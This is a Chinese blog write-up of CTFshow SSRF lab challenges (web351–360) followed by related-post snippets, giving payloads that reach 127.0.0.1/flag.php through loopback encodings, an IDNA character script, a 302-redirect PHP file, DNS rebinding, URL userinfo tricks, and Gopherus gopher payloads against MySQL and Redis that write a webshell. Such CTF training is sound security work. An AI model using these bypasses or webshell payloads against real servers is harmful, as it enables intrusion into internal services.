CTFSHOW SSRF篇

最新推荐文章于 2025-07-01 19:59:11 发布
最新推荐文章于 2025-07-01 19:59:11 发布
阅读量4.7k 收藏 8
点赞数 3
CC 4.0 BY-SA版权
分类专栏: CTFSHOW web入门系列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/miuzzx/article/details/111992415
本文通过一系列实例展示如何绕过不同类型的限制来访问特定的flag.php页面,包括使用特殊IP地址、DNS记录修改、URL重定向等手段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

出了前八道题,因为题目上的比较匆忙,提前做下就当测试题目了。

web351

存在一个flag.php页面,访问会返回不是本地用户的消息,那肯定是要让我们以本地用户去访问127.0.0.1/flag.php
payload:url=http://127.0.0.1/flag.php

web352

过滤了localhost和127.0.0。还是有很多方法的,比如127.0.1 、127.1、 127。0.0.1 或者转成16进制 2进制
转进制的地址https://tool.520101.com/wangluo/jinzhizhuanhuan/

web353

进制转换或者127.1都可以

web354

预期解是利用下面的脚本去替换localhost中的字符

for i in range(128,65537):    
    tmp=chr(i)    
    try:        
        res = tmp.encode('idna').decode('utf-8')        
        if("-") in res:            
            continue        
        print("U:{}    A:{}      ascii:{} ".format(tmp, res, i))    
    except:        
        pass

在这里插入图片描述
比如用a左边的字符去替换a最终就是locⒶhlhost在这里插入图片描述
但是不知道为什么服务器不支持,用了一种比较偏的方法,修改自己域名的a记录,改成127.0.0.1
payload:http://域名/flag.php

web355

要求长度小于5那直接http://127.1/flag.php就可以了。
payload http://127.1/flag.php

web356

要求长度小于3
payload:http://0/flag.php
0在linux系统中会解析成127.0.0.1在windows中解析成0.0.0.0

web357

利用302跳转和dns重绑定都可以。
1、在自己服务器上写个a.php文件内容如下

<?php
header("Location:http://127.0.0.1/flag.php");

然后payload写自己的这个地址就可以了。
payload:http://xxx/a.php
2、在这个网站注册一个账号http://ceye.io/,然后会给你分配一个域名,修改成如下的内容,第一个随便天填,第二个写
在这里插入图片描述

然后payload:http://r.xxxxxx/flag.php xxx为分给你的域名
在这里插入图片描述

多少几次就可以了
具体原理可以看下大佬写的文章https://zhuanlan.zhihu.com/p/89426041

web358

正则表达式的意思是以http://ctf.开头,以show结尾。
payload:http://ctf.@127.0.0.1/flag.php?show
在这里插入图片描述

web359

工具下载地址https://github.com/tarunkant/Gopherus

python gopherus.py --exploit mysql
在这里插入图片描述
然后传到check.php中post: returl=xxxxx,但是不要忘了把下划线后面的内容url编码一次。

web360

python gopherus.py --exploit redis
在这里插入图片描述
操作方法和上面一样不要忘记编码。工具默认是生成shell.php

ctfshow-ssrf
孤桜懶契
08-21 412
前言 记录web的题目wp,慢慢变强,铸剑。 SSRF SSRF(Server-Side Request Forgery: 服务器端请求第二天) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从网无法访问的内部系统。(因为它是由服务端发起的,所以它能够请求到与它相关而与外部网隔离的内部系统) web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=cu
SSRF之基础
unexpectedthing的博客
10-20 554
文章目录SSRF前言简介:几个协议dict协议:file协议gopher协议CTFshowweb351file协议和http协议的区别web352web353web354web355web356参考文献:ctfshow wp其他ctfhub wp SSRF php协议详解(重要) 前言 关于内网和外网的区别: https://zhuanlan.zhihu.com/p/147282153 简介: SSRF,Server-Side Request Forgery,服务端请求伪造,是一种由攻击者构造形成由服务器端
ctfshow--ssrf
ing_end的博客
04-23 4203
SSRF概述及其危害 *SSRF概述 ​ 强制服务器发送一个攻击者的请求 ​ 互联网上的很多web应用提供了从其他服务器(也可以是本地)获取数据的功能。使用用户指定的URL,web应用可以获取图片(载入图片)、文件资源(下载或读取)。如下图所示,百度提供识图功能。如果链接可以访问任意请求,则存在ssrf漏洞 ​ 用户可以从本地或者URL的方式获取图片资源,交给百度识图处理。如果提交的是URL地址,该应用就会通过URL寻找图片资源。如果web 应用开放了类似于百度识图这样的功能,并且对用户提供的URL和远端
CTF自学-SSRF(1)
最新发布
m0_61926696的博客
07-01 397
SSRF(Server-Side Request Forgery)即服务端请求伪造,应用的场景通常是在已经获取某台服务器的漏洞后,利用这台服务器发送请求获取同一内网环境中其他服务器上的资源(或者本服务器上的其他资源),这些资源通常是在内网环境中开放访问而对外网ip则进行限制。
CTFshow——SSRF
lee_maple的博客
04-23 3843
CTFshow——SSRF Web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result
CTFshow SSRF
starttv的博客
11-23 1804
服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。
ctfshow ssrf
08-16
- *1* [ctfshow-web入门 ssrf](https://blog.youkuaiyun.com/weixin_45696568/article/details/114434596)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common...
CTFSHOW-WEB入门代码审计
Re_ly0n的博客
11-02 589
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
【web安全】SSRF的各种利用方式
HBohan的博客
04-19 1962
什么是SSRF SSRF(服务端请求伪造漏洞) 由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 一般情况下,SSRF针对的都是一些外网无法访问的内网,所以需要SSRF使目标后端去访问内网,进而达到我们攻击内网的目的。 通过SSRF,我们可以访问目标内网的redis服务,mysql服务,smpt服务,fastcgi服务等 造成漏洞的一些函数 file_get_contents():将整
ctfshow-SSRF
njh18790816639的博客
04-19 623
SSRF 其全称:Server—Side Request Forgery :服务器端请求伪造 是一种由攻击者构造形成的由 服务器端发起请求的一个安全漏洞。一般情况下,攻击的目是外网没有办法访问的内网。 很多WEb应用都其提供了从其他服务器上获取数据的功能,使用指定的url,web 应用可以获取图片,下载文件,读取文件等。这个功能如果被恶意使用,可以利用存在缺陷的web引用做为代理,攻击远程和本地服务器。 web351 <?php error_reporting(0); highlight_file(_
ctfshow ssrf
m0_62422842的博客
07-10 819
ctfshow入门中的ssrf
ctfshow——SSRF
qq_55202378的博客
05-02 1501
(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
ctfshow-web入门 ssrf
volcano的博客
03-06 2641
ctfshowSSRF简介危害web351web352parse_urlweb353更改IP地址写法web354web355web356web357web358web359(打无密码的mysql)web360(打redis) SSRF 简介 服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 危害 SSRF可以对外网、
ctfshow SSRF
..
02-28 1128
web 351 直接读取本地文件 url=file:///var/www/html/flag.php url=127.0.0.1/flag.php web352 这里要求是http或者https协议,只需要满足这个就可以了。 url=http://localhost/flag.php url=http://127.0.0.1/flag.php url=http://127.1/flag.php url=http://0.0.0.0/flag.php url=http:/...
PHP FILTER_VALIDATE_IP 过滤器
weixin_34403693的博客
06-25 439
FILTER_VALIDATE_IP 过滤器把值作为 IP 进行验证,用于验证 IP 是否合法,支持 IPV6 验证 例子 <?php $ip = "192.168.0.1"; if(!filter_var($ip, FILTER_VALIDATE_IP)) { echo "IP is not valid"; } else { echo "IP is v...
ctfshowssrf
2401_87493916的博客
12-17 1394
if判断⾥的: FILTER_FLAG_IPV4 - 要求值是合法的 IPv4 IP FILTER_FLAG_IPV6 - 要求值是合法的 IPv6 IP FILTER_FLAG_NO_PRIV_RANGE - 要求值是 RFC 指定的私域 IP (⽐如 192.168.0.1) FILTER_FLAG_NO_RES_RANGE - 要求值不在保留的 IP 范围内。cURl去获取$url指定的页面内容,curl_setopt 函数设置 cURL 选项,curl_exec 函数执行 cURL 会话。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值